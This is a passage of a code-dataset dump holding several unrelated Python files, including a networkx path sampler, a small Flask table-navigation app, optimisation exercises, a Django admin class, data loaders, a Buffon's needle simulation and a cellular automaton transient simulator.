Repeat from 1 until there are no more nodes to prune.\r\n\r\n Parameters\r\n ----------\r\n pg : networkx.DiGraph\r\n Paths graph to prune.\r\n nodes_to_prune : list\r\n Nodes to prune from paths graph.\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n\r\n Returns\r\n -------\r\n networkx.DiGraph()\r\n Pruned paths graph.\r\n \"\"\"\r\n # First check if we are pruning any nodes to prevent unnecessary copying\r\n # of the paths graph\r\n if not nodes_to_prune:\r\n return pg\r\n # Make a copy of the graph\r\n pg_pruned = pg.copy()\r\n # Perform iterative pruning\r\n while nodes_to_prune:\r\n # Remove the nodes in our pruning list\r\n pg_pruned.remove_nodes_from(nodes_to_prune)\r\n # Make a list of nodes whose in or out degree is now 0 (making\r\n # sure to exclude the source and target, whose depths are at 0 and\r\n # path_length, respectively)\r\n no_in_edges = [node for node, in_deg in pg_pruned.in_degree_iter()\r\n if in_deg == 0 and node != source]\r\n no_out_edges = [node for node, out_deg in pg_pruned.out_degree_iter()\r\n if out_deg == 0 and node != target]\r\n nodes_to_prune = set(no_in_edges + no_out_edges)\r\n return pg_pruned\r\n\r\n\r\n# Function for updating node tags in place\r\ndef _add_tag(tag_dict, tag_node, nodes_to_tag):\r\n for v in nodes_to_tag:\r\n tag_dict[v].append(tag_node[1])\r\n\r\n\r\ndef _forward(v, H):\r\n \"\"\"Compute the subgraph of H defined by the paths forward from node v.\r\n\r\n Parameters\r\n ----------\r\n v : tuple(int, str)\r\n The node to get the _forward subgraph for.\r\n H : networkx.DiGraph()\r\n For a given path length n, H defines the graph G_i at the i-th stage\r\n for 1 <= i <= n.\r\n\r\n Returns\r\n -------\r\n networkx.DiGraph()\r\n Subgraph reachable by forward paths from v in H.\r\n \"\"\"\r\n j = v[0]\r\n L = {}\r\n L[j] = [v]\r\n h = nx.DiGraph()\r\n for k in range(j+1, 10):\r\n for v in L[k-1]:\r\n h.add_edges_from(H.out_edges(v))\r\n L[k] = [w for w in h if w[0] == k]\r\n return h\r\n\r\n\r\ndef _backward(v, H):\r\n \"\"\"Compute the subgraph of H defined by the paths backward from node v.\r\n\r\n Parameters\r\n ----------\r\n v : tuple(int, str)\r\n The node to get the _backward subgraph for.\r\n H : networkx.DiGraph()\r\n For a given path length n, H defines the graph G_i at the i-th stage\r\n for 1 <= i <= n.\r\n\r\n Returns\r\n -------\r\n networkx.DiGraph()\r\n Subgraph reachable by backward paths from v in H.\r\n \"\"\"\r\n j = v[0]\r\n L = {}\r\n L[j] = [v]\r\n J = list(reversed(range(0, j)))\r\n h = nx.DiGraph()\r\n for k in J:\r\n for v in L[k+1]:\r\n h.add_edges_from(H.in_edges(v))\r\n L[k] = [w for w in h if w[0] == k]\r\n return h\r\n\r\n\r\ndef _cf_succ(H, t, path, v):\r\n \"\"\"Randomly choose a successor node of v.\r\n\r\n Parameters\r\n ----------\r\n H : networkx.DiGraph()\r\n The cycle free paths graph.\r\n t : dict\r\n The tags dictionary.\r\n path : list\r\n The path so far (list of nodes).\r\n v : tuple\r\n The current node.\r\n\r\n Returns\r\n -------\r\n tuple\r\n Randomly chosen successor node on a non-cyclic path.\r\n \"\"\"\r\n succ = []\r\n for u in H.successors(v):\r\n if set(path) <= set(t[u]):\r\n succ.append(u)\r\n # Note that the circuitous way of choosing from this list is the result of\r\n # the odd way numpy.random handles lists of lists (it excepts).\r\n idx_list = list(range(len(succ)))\r\n w_idx = np.random.choice(idx_list)\r\n w = succ[w_idx]\r\n return w\r\n\r\n\r\ndef sample_single_path(source, 
target, H, t):\r\n \"\"\"Sample a single cycle-free path.\r\n\r\n The sampling procedure uses the tag sets to trace out cycle-free\r\n paths. If we have reached a node *v* via the path *p* then we can choose\r\n the successor *u* of *v* as the next node only if *p* appears in the tag\r\n set of u.\r\n\r\n Parameters\r\n ----------\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n H : networkx.DiGraph()\r\n The cycle free paths graph.\r\n t : dict\r\n The tags dictionary.\r\n\r\n Returns\r\n -------\r\n list of strings\r\n A randomly sampled, non-cyclic path. Nodes are represented as node\r\n names only, i.e., the depth prefixes are removed.\r\n \"\"\"\r\n path = [source[1]]\r\n current = source\r\n while current != target:\r\n next = _cf_succ(H, t, path, current)\r\n \"\"\" a sanity check; since I have not stree-tested the code yet \"\"\"\r\n assert next[1] not in path, \"Error: found a cycle\"\r\n path.append(next[1])\r\n current = next\r\n return tuple(path)\r\n\r\n\r\ndef sample_many_paths(source, target, H, t, n):\r\n \"\"\"Sample many cycle-free paths.\r\n\r\n Parameters\r\n ----------\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n H : networkx.DiGraph()\r\n The cycle free paths graph.\r\n t : dict\r\n The tags dictionary.\r\n\r\n Returns\r\n -------\r\n list of lists\r\n Each item in the list is a list of strings representing a path. Note\r\n that the paths may not be unique.\r\n \"\"\"\r\n # If the graph is empty, then there are no paths\r\n if not H:\r\n return []\r\n P = []\r\n for i in range(0, n):\r\n p = sample_single_path(source, target, H, t)\r\n P.append(p)\r\n return P\r\n\r\n\r\ndef sample_paths(g, source, target, max_depth, target_polarity=None,\r\n num_paths=1000):\r\n print('Source: %s' % source)\r\n signed = True if target_polarity is not None else False\r\n\r\n (f_level, b_level) = paths_graph.get_reachable_sets(\r\n g, source, target, max_depth=10, signed=signed)\r\n all_paths = []\r\n for length in range(1, max_depth):\r\n print(\"Path length: %d\" % length)\r\n pg_raw = paths_graph.paths_graph(g, source, target, length, f_level,\r\n b_level, signed=signed,\r\n target_polarity=target_polarity)\r\n # Append depths to our source and target nodes\r\n src = (0, (source, 0))\r\n tgt = (length, (target, target_polarity))\r\n dic_PG = cycle_free_paths_graph(pg_raw, src, tgt, length)\r\n G_cf, T = dic_PG[length-1]\r\n try:\r\n P = sample_many_paths(src, tgt, G_cf, T, num_paths)\r\n all_paths.extend(P)\r\n except IndexError:\r\n pass\r\n return all_paths\r\n\r\n\r\nif __name__ == '__main__':\r\n G_0 = paths_graph.get_edges('korkut_im.sif')\r\n source = 'BLK_phosphoY389_phosphorylation_PTK2_Y397'\r\n target = 'EIF4EBP1_T37_p_obs'\r\n\r\n (f_level, b_level) = paths_graph.get_reachable_sets(G_0, source, target,\r\n max_depth=10, signed=False)\r\n length = 8\r\n\r\n pg_raw = paths_graph.paths_graph(G_0, source, target, length, f_level,\r\n b_level, signed=False, target_polarity=0)\r\n\r\n # Append depths to our source and target nodes\r\n src = (0, source)\r\n tgt = (length, target)\r\n dic_PG = cycle_free_paths_graph(pg_raw, src, tgt, length)\r\n G_cf, T = dic_PG[7]\r\n P = sample_many_paths(src, tgt, G_cf, T, 1000)\r\n #print(\"--- %s seconds ---\" % (time.time() - 
start_time))\r\n\r\n","sub_path":"indra/explanation/cycle_free_paths_old.py","file_name":"cycle_free_paths_old.py","file_ext":"py","file_size_in_byte":16661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168329150","text":"#!/usr/bin/env python\nfrom flask import * \n\nvalue = 0\n\napp = Flask(__name__) \n \n@app.route('/login',methods = ['POST']) \ndef login(): \n uname=request.form['number'] \n #passwrd=request.form['pass'] \n if uname==\"A\": \n # global value\n # value = 1\n # print(value)\n lines = [\"1\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"B\": \n lines = [\"2\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"C\": \n lines = [\"3\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"D\": \n lines = [\"4\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"H\":\n lines = [\"0\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to HOME\" \n\n else:\n return \"Entered wrong table number\"\n\n \nif __name__ == '__main__': \n app.run(debug = True) ","sub_path":"1st Externship Batch/Autonomous Navigation/c20_menu/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"343231810","text":"import matplotlib.pyplot as plt\nfrom numpy import *\nfrom math import *\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef f(x,y): \n return ((x-y)**2 + 10*(x**2-y)**2)\n\n \n\n#TRACER UNE FONCTION F(x,y) sur [-10,10]\nX=linspace(-10,10,10)\nY=linspace(-10,10,10)\nX,Y=meshgrid(X,Y)\nZ=f(X,Y)\n\n\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nax.plot_wireframe(X, Y, Z) # tracé de la courbe\n\nax.set_xlabel('Axe x') # label de l'axe Ox\nax.set_ylabel('Axe y') # label de l'axe Oy\nax.set_zlabel('Axe z') # label de l'axe Oz\nax.set_zlabel('Z Label')\n\n\n#METHODE GRADIENT PAS FIXE POUR F(x,y)\ndef norme (x): #x est de la forme (a,b)\n '''x est un vecteur de R^2 et on calcule sa norme'''\n return(sqrt(x[0]**2+ x[1]**2))\n \ndef gradf (x, y):\n '''gradient de la fonction de Rosenbrook'''\n return((2*x-2+ 40*x*(x**2-y), -20*(x**2-y)))\n\ndef pas_Fixe (x, p): #p est le pas x est le vecteur de R^2\n epsilon = 0.01 #erreur de convergence de la suite des xk\n nmax= 1000 #nombre maximal d'itérations de l'algorithme fixé par l'utilisateur \n n=0 #compteur d'itérations\n a,b = x\n X=[a] #liste des abscisses de xk\n Y=[b] #idem mais ordonnées\n\n while norme( gradf(a,b)) > epsilon and n epsilon: #on s'arrete lorsuq'on a un intervalle suffisament petit autour du minimum\n #calcul des nouvelles bornes potentielles de l'intervalle\n #a< a'< b'< b\n aprime= a + (b-a)/(tau**2)\n bprime= a + (b-a)/tau\n if pasOptimal (aprime, x)> pasOptimal (bprime, x):\n #le minimum est dans la partie droite de l'intervalle: [a', b]\n a= aprime\n if pasOptimal (aprime, x)< pasOptimal (bprime, x):\n #le minimum est dans la partie gauche de l'intervalle: [a, b']\n b= bprime\n else:\n #le minimum est entre a' et b'\n a= aprime\n b= bprime\n err= b-a\n it+=1\n return((a+b)/2) #on convient d'approximer la valeur du minimum par celle du centre de l'intervalle le contenant\n\ndef grad_pasOptimal (x, p):\n 
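# --- Illustrative aside (not part of the dataset records) ---
# tp_1.py above runs fixed-step gradient descent. Note that its gradf is the
# gradient of (x-1)**2 + 10*(x**2-y)**2 (a Rosenbrock-style variant), not of
# the f(x,y) = (x-y)**2 + 10*(x**2-y)**2 defined at the top of the file. A
# compact, plot-free sketch using the gradient of the f actually defined
# (step size, tolerance and start point are assumptions):
def grad_descent(grad, x0, step=0.001, tol=1e-2, max_iter=10000):
    x, y = x0
    for _ in range(max_iter):
        gx, gy = grad(x, y)
        if (gx * gx + gy * gy) ** 0.5 <= tol:   # stop when the gradient is small
            break
        x, y = x - step * gx, y - step * gy
    return x, y

grad_f = lambda x, y: (2 * (x - y) + 40 * x * (x**2 - y),
                       -2 * (x - y) - 20 * (x**2 - y))
print(grad_descent(grad_f, (0.5, 0.5)))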
epsilon = 0.01\n nmax= 1000\n n=0\n a,b = x\n Z=[f(a,b)]\n while norme( gradf(a,b)) > epsilon and n Eps and i < 200000000 :\n aprime = a + ((b-a)/t**2)\n bprime = a + ((b-a)/t)\n if f(aprime) > f(bprime):\n a = aprime\n elif f(aprime) < f(bprime) : \n b = bprime\n else :\n a = aprime\n b = bprime \n Err = b-a\n i+=1\n return((a+b)/2)\n ","sub_path":"tp_1.py","file_name":"tp_1.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"148445202","text":"from django.contrib import admin\n\nfrom .models import UserProfile\n\n\nclass UserProfileModelAdmin(admin.ModelAdmin):\n list_display = [\n 'user',\n 'slug',\n 'gender',\n 'birthday',\n 'phone_no',\n 'country',\n ]\n list_display_links = [\n 'user',\n 'slug',\n ]\n list_filter = [\n 'gender',\n 'birthday',\n 'country',\n ]\n search_fields = [\n 'user__username',\n 'user__first_name',\n 'user__last_name',\n 'slug',\n 'description',\n 'google_social',\n 'facebook_social',\n 'instagram_social',\n 'twitter_social',\n 'vk_social',\n 'interests__name',\n 'birthday',\n 'phone_no',\n 'followers__user__username',\n 'following__user__username',\n ]\n\n class Meta:\n model = UserProfile\n\n\nadmin.site.register(UserProfile, UserProfileModelAdmin)\n","sub_path":"userprofile_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468065604","text":"import os\nimport pandas as pd\nimport numpy as np\n\nfrom codifyComplexes.CodifyComplexException import CodifyComplexException\nfrom Config import Configuration\n\nclass DataLoader(Configuration):\n '''\n This class implements loading file functions\n '''\n \n ARE_STR_TYPE_COLUMNS= [\"chainId\", \"structResId\", \"chainIdL\", \"structResIdL\", \"resNameL\", \"chainIdR\", \n \"structResIdR\", \"resNameR\", \"resName\" ]\n ALWAYS_SKIP_COLUMNS=[\"seqIndex\"]\n IGNORE_X_AA= False\n \n def __init__(self, dataRootPath, singleChainfeatsToInclude, pairfeatsToInclude=None, verbose=False):\n '''\n @param dataRootPath: str. A path to computedFeatures directory that contains needed features. Example:\n computedFeatures/\n common/\n contactMaps/\n seqStep/\n conservation/\n ...\n structStep/\n PSAIA/\n VORONOI/\n ... \n\n @param singleChainfeatsToInclude: dict. Dictionary that contains the paths where features needed for complex codification \n that describe single chain properties are\n located. 
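# --- Illustrative aside (not part of the dataset records) ---
# nombre_or / GoldenSection above implement golden-section search: each step
# shrinks the bracket [a, b] by the golden ratio while keeping the half that
# must contain the minimum. A cleaned-up sketch (the tolerance and the test
# function are assumptions):
from math import sqrt

def golden_section_min(f, a, b, tol=1e-4):
    tau = (1 + sqrt(5)) / 2
    while b - a > tol:
        a1 = a + (b - a) / tau**2    # interior points, a < a1 < b1 < b
        b1 = a + (b - a) / tau
        if f(a1) > f(b1):
            a = a1                   # minimum lies in [a1, b]
        else:
            b = b1                   # minimum lies in [a, b1]
    return (a + b) / 2               # centre of the final bracket

print(golden_section_min(lambda t: (t - 2.0)**2, 0.0, 5.0))  # ~2.0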
Must have the following format:\n {\"featName\":(relativePath_from_dataRootPath, listOfColumnNumbers, dictForNamedColums)}\n dictForNamedColums= {\"myFeatName\":colNumber}\n @param pairfeatsToInclude: dict. Dictionary that contains the paths where features needed for complex codification \n that describe single chain properties are\n located. Must have the following format:\n {\"featName\":(relativePath_from_dataRootPath, listOfColumnNumbers, dictForNamedColums)}\n dictForNamedColums= {\"myFeatName\":colNumber}\n @param verbose: bool.\n ''' \n Configuration.__init__(self)\n self.dataRootPath= dataRootPath\n self.verbose= verbose\n self.singleChainfeatsToInclude= singleChainfeatsToInclude\n self.pairfeatsToInclude= None if pairfeatsToInclude is None else pairfeatsToInclude[:]\n\n def getParamsForLoadingFile(self, prefixOneChainType, featNum, useNameColum=None, lookForPairFeats=False):\n '''\n Given a ligand or receptor id (prefixOneChainType) and a feature_name(featName) which is a key \n in self.singleChainfeatsToInclude dictionary, returns an iterator over all files involved in that \n feature and the column numbers that were selected. By default, selected columns are stored\n in self.singleChainfeatsToInclude, but if useNameColum is specified, selectedCols will be a one \n element list with the index of the column whose name matches useNameColum\n @param prefixOneChainType: str. A prefix that identifies the receptor or the ligand of a complex\n @param featNum: int. index of the singleChainfeatsToInclude list that contains information of features\n @param useNameColum: str. If None, selectedCols will be obtained from self.singleChainfeatsToInclude.\n Otherwise, selectedCols= [ colNum ], where colNum is the column number\n of the column whose name matches useNameColum\n @param lookForPairFeats: bool. Whether to load pairwise features or single chain features otherwise \n @return (fnamesIterator, selectedCols)\n fnamesIterator: Iterator str. Fnames that contains feature featName for ligand or receptor id\n prefixOneChainType\n selectedCols: int[]. Columns that will be selected \n '''\n## print(self.singleChainfeatsToInclude, featNum)\n if lookForPairFeats:\n featName, (relativePathToFeats, selectedCols, nameColDict) = self.pairfeatsToInclude[featNum]\n else:\n featName, (relativePathToFeats, selectedCols, nameColDict) = self.singleChainfeatsToInclude[featNum]\n if useNameColum is not None: selectedCols= [nameColDict[useNameColum]]\n featuresPath= os.path.join(self.dataRootPath, relativePathToFeats)\n return featName, (self.getFullNamesIterInPath(prefixOneChainType, featuresPath), selectedCols)\n \n def loadDataFile(self, fnamesIterator, selectedCols=None):\n '''\n Returns the pandas.DataFrame resulting from the concatenation of all the files\n contained in fnamesIterator\n @param fnamesIterator: Iterator of file names containing features to be loaded. \n @param selectedCols: int[]. List of columns to be selected. If None\n all columns will be selected\n @return df: pandas.DataFrame. 
A pandas.Dataframe in which each row represents the feature of \n a residue that is contained in one of the file names of fnamesIterator\n Column names are specified in the header of files\n\n '''\n resultDF_list= []\n factorColumns={}\n fnamesList= list(fnamesIterator)\n for fname in fnamesList:\n try:\n df= pd.read_table(fname,sep='\\s+', header='infer', comment=\"#\", \n dtype= {elem:str for elem in DataLoader.ARE_STR_TYPE_COLUMNS})\n if DataLoader.IGNORE_X_AA:\n if \"resName\" in df:\n df= df[df[\"resName\"]!=\"X\"]\n if \"resNameL\" in df:\n df= df[(df[\"resNameL\"]!=\"X\") & (df[\"resNameR\"]!=\"X\")]\n except pd.io.common.CParserError:\n print(\"Error reading %s\"%fname)\n raise\n df_toCheck= df if not \"categ\" in df else df.drop(\"categ\",axis=1)\n## print(df_toCheck.head())\n if df_toCheck.isnull().values.any()==True:\n raise ValueError(\"There are missing values or nans in %s\"%fname)\n with open(fname) as f:\n firstLine= f.readline()\n if firstLine.startswith(\"#Levels\"):\n factorColumns= self._parseLevels(firstLine, df.columns)\n for colName in factorColumns:\n df[colName]= pd.Categorical(df[colName], categories=factorColumns[colName], ordered=False) \n #Select desired columns \n if not selectedCols is None:\n ids_cols=[]\n for i,colum in enumerate(df.columns):\n if colum in DataLoader.ARE_STR_TYPE_COLUMNS:\n ids_cols.append(i)\n assert len(set(ids_cols).intersection(set(selectedCols))) ==0, (\"problems loading file %s. Ids_cols and \"+\n \"selectedCols overlap\")%fname \n df= df.ix[:, ids_cols+ selectedCols]\n for colName in DataLoader.ALWAYS_SKIP_COLUMNS:\n if colName in df:\n del df[colName]\n\n df= pd.get_dummies(df, prefix_sep='_dummy_', columns= list(factorColumns.keys()))\n resultDF_list.append( df )\n df= pd.concat(resultDF_list)\n assert df.shape[0]> 1, \"Error loading files %s there are no rows\"%str(fnamesList)\n return df\n \n def _parseLevels(self, firstLine, colNames):\n '''\n Helper method for self.loadDataFile. Itparses first line of a file\n looking for factor variables levels\n @param firstLine: str. The first line of a file\n @param colNames: str[]. The column names of the pandas.DataFrame\n @return colNumDict: { colName:[level0, level1 ...]}\n ''' \n colNumDict= [ factorDes.split(\":\") for factorDes in firstLine.split()[1:] ]\n colNumDict= { colNames[int(factorDes[0])]:factorDes[1].split(\";\") for factorDes in colNumDict }\n return colNumDict\n \n def getFullNamesIterInPath(self, prefix, dirname):\n '''\n returns a full filename that startswith given prefix an belongs to \n directory dirname\n @param prefix: str. the prefixes with which file names must start to be considered\n @param dirname: str. The directory where files will be looked for\n @yields fullName. 
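# --- Illustrative aside (not part of the dataset record) ---
# loadDataFile above parses '#Levels' headers, marks those columns as pandas
# Categoricals with a fixed set of levels, and one-hot encodes them with
# pd.get_dummies. The encoding step in isolation on a toy frame (column
# names and levels are made up; note the unseen level 'X' still yields an
# all-zero dummy column because the categories are fixed):
import pandas as pd

df = pd.DataFrame({'resName': ['A', 'G', 'A'], 'score': [0.1, 0.5, 0.2]})
df['resName'] = pd.Categorical(df['resName'], categories=['A', 'G', 'X'])
print(pd.get_dummies(df, prefix_sep='_dummy_', columns=['resName']))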
The full name of a file that startswith prefix and is in dirname\n '''\n fullName= None\n for fname in os.listdir(dirname):\n if fname.startswith(prefix):\n fullName= os.path.join(dirname, fname)\n yield fullName\n\n","sub_path":"codifyComplexes/codifyProtocols/DataLoaderClass.py","file_name":"DataLoaderClass.py","file_ext":"py","file_size_in_byte":8207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556579313","text":"'''@file alignment_reader.py\ncontains the AlignmentReader class'''\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport tfreader\n\nclass AlignmentReader(tfreader.TfReader):\n '''reader for kaldi alignments'''\n\n def _read_metadata(self, datadirs):\n '''read the mean and std for normalization and the input dimension\n\n Args:\n datadir: the directory where the metadata was written\n\n Returns:\n the metadata as a dictionary\n '''\n\n metadata = dict()\n\n #read the maximum lengths\n max_lengths = []\n for datadir in datadirs:\n with open(os.path.join(datadir, 'max_length')) as fid:\n max_lengths.append(int(fid.read()))\n metadata['max_length'] = max(max_lengths)\n\n #read the sequence length histograms\n metadata['sequence_length_histogram'] = np.zeros(\n [metadata['max_length'] + 1])\n for datadir in datadirs:\n with open(os.path.join(datadir,\n 'sequence_length_histogram.npy')) as fid:\n histogram = np.load(fid)\n metadata['sequence_length_histogram'][:histogram.shape[0]] += (\n histogram\n )\n\n return metadata\n\n def _create_features(self):\n '''\n creates the information about the features\n\n Returns:\n A dict mapping feature keys to FixedLenFeature, VarLenFeature,\n and SparseFeature values\n '''\n\n return {'data': tf.FixedLenFeature([], dtype=tf.string)}\n\n def _process_features(self, features):\n '''process the read features\n\n features:\n A dict mapping feature keys to Tensor and SparseTensor values\n\n Returns:\n a pair of tensor and sequence length\n '''\n\n data = tf.decode_raw(features['data'], tf.int32)\n sequence_length = tf.shape(data)[0]\n\n return data, sequence_length\n","sub_path":"nabu/processing/tfreaders/alignment_reader.py","file_name":"alignment_reader.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203547481","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nclass Line:\n def __init__(self, line_distance):\n self.D = line_distance\n self.line_under = 1.0\n\nclass Needle:\n def __init__(self, length, n_step):\n self.L = length\n line = Line(10)\n self.middle = line.line_under + line.D * np.random.rand(n_step)\n self.theta = np.pi * np.random.rand(n_step)\n\nclass Simulation:\n def __init__(self, n_step):\n self.n_step = n_step\n\n needle = Needle(5, self.n_step)\n self.L = needle.L\n self.middle = needle.middle\n self.theta = needle.theta\n\n line = Line(10)\n self.D = line.D\n self.line_under = line.line_under\n\n def plot_needle(self):\n\n fig = plt.figure(figsize=(6, 6))\n imgs = []\n\n for i in range(self.n_step):\n x = [self.L/2*np.cos(self.theta[i]+np.pi), self.L/2*np.cos(self.theta[i])]\n y = [self.middle[i]+self.L/2*np.sin(self.theta[i]+np.pi), self.middle[i]+self.L/2*np.sin(self.theta[i])]\n img1 = plt.plot(x,y)\n\n imgs.append(img1)\n\n anim = animation.ArtistAnimation(fig, imgs, interval=100, repeat=False)\n\n plt.xlim(-10,10)\n plt.ylim(-7.5,17.5)\n\n p = np.arange(-10,10,0.01)\n q = np.full(p.shape[0], 
-6.0)\n r = np.full(p.shape[0], 6.0)\n p = np.arange(-10, 10, 0.01)\n q = np.full(p.shape[0], self.line_under)\n r = np.full(p.shape[0], self.line_under+self.D)\n plt.plot(p, q, linestyle=\"-\", linewidth=0.5, color='black')\n plt.plot(p, r, linestyle=\"-\", linewidth=0.5, color='black')\n\n anim.save('needle_only.gif', 'imagemagick')\n\n plt.show()\n\n def calculation(self):\n\n judge = []\n\n for i in range(self.n_step):\n down = self.middle[i] + self.L/2 * np.sin(self.theta[i]+np.pi)\n up = self.middle[i] + self.L/2 * np.sin(self.theta[i])\n if (up < self.D + self.line_under) & (down > self.line_under):\n judge.append(0)\n else:\n judge.append(1)\n\n probability = judge.count(1) / len(judge)\n\n calculated_pi = 2 * self.L / self.D / probability\n\n relative_error = abs(np.pi-calculated_pi) / np.pi\n\n print('calculated pi is {}'.format(calculated_pi))\n print('n_step: {} , relative_error: {}'.format(self.n_step, relative_error))\n\nif __name__ == '__main__':\n\n simulation = Simulation(200)\n simulation.plot_needle()\n simulation.calculation()\n\n\n\n\n\n\n\n","sub_path":"Buffon's needle problem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"451109056","text":"import os\n\nGCP_PROJECT = os.environ['HAIL_GCP_PROJECT']\nassert GCP_PROJECT != ''\nGCP_ZONE = os.environ['HAIL_GCP_ZONE']\nassert GCP_ZONE != ''\nGCP_REGION = '-'.join(GCP_ZONE.split('-')[:-1]) # us-west1-a -> us-west1\nDOCKER_PREFIX = os.environ.get('HAIL_DOCKER_PREFIX', f'gcr.io/{GCP_REGION}')\nassert DOCKER_PREFIX != ''\nDOCKER_ROOT_IMAGE = os.environ['HAIL_DOCKER_ROOT_IMAGE']\nassert DOCKER_ROOT_IMAGE != ''\nDOMAIN = os.environ['HAIL_DOMAIN']\nassert DOMAIN != ''\nIP = os.environ.get('HAIL_IP')\nCI_UTILS_IMAGE = os.environ.get('HAIL_CI_UTILS_IMAGE', f'{DOCKER_PREFIX}/ci-utils:latest')\nBUILDKIT_IMAGE = os.environ['HAIL_BUILDKIT_IMAGE']\nDEFAULT_NAMESPACE = os.environ['HAIL_DEFAULT_NAMESPACE']\nKUBERNETES_SERVER_URL = os.environ['KUBERNETES_SERVER_URL']\nBUCKET = os.environ['HAIL_CI_BUCKET_NAME']\n","sub_path":"ci/ci/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"202119344","text":"import numpy as np\nimport os.path\nimport json\nimport concurrent.futures as cf\nimport signal\nfrom itertools import product\nimport matplotlib.pyplot as plt\nfrom collections import Counter \n\n# Import data\n\n\n\n\nTIME_BOUND = 500\n\nclass MyTimeoutError(Exception):\n def __init__(self, value = \"Timed Out\"):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\ndef timeout(seconds_before_timeout):\n def decorate(f):\n def handler(signum, frame):\n raise MyTimeoutError()\n def new_f(*args, **kwargs):\n old = signal.signal(signal.SIGALRM, handler)\n signal.alarm(seconds_before_timeout)\n try:\n result = f(*args, **kwargs)\n finally:\n # reinstall the old signal handler\n signal.signal(signal.SIGALRM, old)\n # cancel the alarm\n # this line should be inside the \"finally\" block (per Sam Kortchmar)\n signal.alarm(0)\n return result\n new_f.func_name = f.__name__\n return new_f\n return decorate\n\n\n\ndef F(state, f_dic):\n n = len(state)\n new_state = \"\"\n for i in range(1, len(state)-1):\n new_state += f_dic[state[(i-1)%n] + state[i%n] + state[(i+1)%n]]\n return new_state\n\ndef f(rule):\n wolfram = np.binary_repr(rule, 8)\n f_dic = {}\n for i in 
range(8):\n f_dic[np.binary_repr(i, 3)] = wolfram[7-i]\n return f_dic\n\ndef generate_random_initial_condition(grid_size):\n return \"\".join(str(a) for a in np.random.choice([0, 1], size=(grid_size,), p=[1./3, 2./3]))\n\ndef save_rule_cache(rule, limit=16):\n print(f\"generating rule {rule} cache...\")\n rule_cache = {}\n f_dict = f(rule)\n for i in range(limit, 2, -1):\n for u in range(2**i):\n key = np.binary_repr(u, i)\n rule_cache[key] = ''.join(str(e) for e in F(key, f_dict))\n path = os.path.expanduser(f\"~/rule_caches/rule_cache_{rule}.json\")\n json.dump(rule_cache, open(path, 'w'), indent=2)\n return rule_cache\n \ndef read_cache(rule):\n path = os.path.expanduser(f\"~/rule_caches/rule_cache_{rule}.json\")\n if os.path.isfile(path) and os.access(path, os.R_OK):\n with open(path, \"r\") as file:\n cache = json.load(file)\n else:\n cache = save_rule_cache(rule)\n return cache\n\n@timeout(TIME_BOUND)\ndef simulate(rule_cache, init, divident=14):\n history = {}\n state = init\n l = len(state)\n q = l//divident\n r = l%divident\n t = 0\n while True:\n try:\n previous_time = history[state]\n return previous_time, t\n except:\n history[state] = t\n new_state = \"\"\n for i in range(0, q):\n new_state +=rule_cache[ state[divident*i-1] + state[divident*i:divident*i+divident] + state[(divident*i+divident)%l]]\n if r:\n new_state += rule_cache[state[divident*q-1] + state[divident*q: l] + state[0]]\n state = new_state\n t += 1\n\n\ndef read_results(path):\n if os.path.isfile(path) and os.access(path, os.R_OK):\n with open(path, \"r\") as file:\n results = json.load(file)\n else:\n json.dump({}, open(path, \"w\"))\n results = {}\n return results\n\n\n\ndef transients(rule, inits):\n for init in inits:\n grid_size = len(init)\n# print(f\"starting to compute, rule={rule}, grid_size={grid_size}, init={init}\")\n path = os.path.expanduser(f\"~/ECA_results2/rule{rule}_{grid_size}.json\")\n rule_cache = read_cache(rule)\n res = read_results(path)\n \n t, _ = simulate(rule_cache, init)\n res[init] = t\n json.dump(res, open(path, \"w\"))\n \n values = list(res.values())\n hist = {}\n for ele in values: \n if str(ele) in hist: \n hist[str(ele)] += 1\n else : \n hist[str(ele)] = 1\n\n x = [int(i) for i in hist.keys()]\n y = [hist[i] for i in hist.keys()]\n\n\n plt.bar(x, y, color=\"darkred\")\n plt.title(f'True Distribution for n={len(inits[0])}')\n plt.ylabel(\"frequency\")\n# plt.yticks(np.arange(min(values), max(values)+1, 1.0))\n plt.xlabel(\"transient length\")\n plt.show()\n \n\n\n# Plot\n# kwargs = dict(hist_kws={'alpha':.6}, kde_kws={'linewidth':2})\n# \n# plt.figure(figsize=(10,7), dpi= 80)\n# sns.distplot(values, color=\"dodgerblue\", 